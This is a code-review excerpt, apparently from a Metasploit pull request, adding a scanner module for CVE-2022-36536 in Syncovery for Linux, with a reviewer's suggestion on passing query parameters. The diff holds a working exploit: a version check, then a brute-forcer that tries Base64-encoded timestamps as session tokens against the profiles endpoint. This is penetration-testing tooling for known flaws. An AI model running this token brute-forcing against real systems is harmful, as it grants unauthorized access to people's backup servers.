modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb

```diff
@@ -0,0 +1,150 @@
+      'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',
+      'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername', 'PASSWORD_SPRAY', 'BLANK_PASSWORDS',
+      'USER_FILE', 'USERPASS_FILE', 'PASS_FILE', 'PASSWORD'
+    )
+  end
+
+  def check_host(_ip)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
+      'method' => 'GET'
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to host - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Error (response code: #{res.code})") if res.code != 200
+
+    if res.code == 200
+      json_res = res.get_json_document
+      if json_res && (json_res['isSyncoveryLinux'] || !json_res['isSyncoveryWindows'])
+        version = (json_res['SyncoveryTitle']).scan(/Syncovery\s([A-Za-z0-9.]+)/).flatten[0] || ''
+        if version.empty?
+          vprint_warning("#{rhost}:#{rport} - Could not identify version")
+          Exploit::CheckCode::Detected
+        elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == '9.48'
+          vprint_good("#{rhost}:#{rport} - Syncovery #{version}")
+          Exploit::CheckCode::Vulnerable
+        else
+          vprint_status("#{rhost}:#{rport} - Syncovery #{version}")
+          Exploit::CheckCode::Safe
+        end
+      else
+        Exploit::CheckCode::Safe
+      end
+    end
+  end
+
+  def run_host(_ip)
+    # Calculate dates
+    days = datastore['DAYS']
+    if days < 0
+      days = 0
+    end
+    dates = []
+    (0..days).each do |day|
+      dates << (Date.today - day).strftime('%m/%d/%Y')
+    end
+    time = DateTime.now.strftime('%H:%M:%S')
+    hrs = (time.split(':')[0])
+    min = (time.split(':')[1])
+    sec = (time.split(':')[2])
+
+    # Create an array of possible session token values
+    token_queue = []
+    dates.each do |date|
+      (0..hrs.to_i).reverse_each do |hours|
+        (0..min.to_i).reverse_each do |minutes|
+          (0..sec.to_i).reverse_each do |seconds|
+            timestamp = "#{date} #{format('%.2d', hours)}:#{format('%.2d', minutes)}:#{format('%.2d', seconds)}"
+            token_queue << Base64.strict_encode64(timestamp).strip
+          end
+          sec = 59
+        end
+        min = 59
+      end
+      hrs = 23
+    end
+
+    # Send the request and parse the response. If it does not include 'Session Expired' the token is valid
+    begin
+      print_status("#{peer.strip} - Starting Brute-Forcer")
+      token_queue.each do |token|
+        login_uri = normalize_uri(target_uri.path, '/profiles.json?recordstartindex=0&recordendindex=0')
+        res = send_request_cgi({
+          'uri' => login_uri,
+          'method' => 'GET',
+          'headers' => {
+            'token' => token
+          }
+        })
```

Comment:
We should use `vars_get` for parameters instead of adding them directly to the URI:
```suggestion
        login_uri = normalize_uri(target_uri.path, '/profiles.json')
        res = send_request_cgi({
          'uri' => login_uri,
          'method' => 'GET',
          'headers' => {
            'token' => token
          },
          'vars_get' => {
            'recordstartindex' => '0',
            'recordendindex' => '0'
          }
        })
```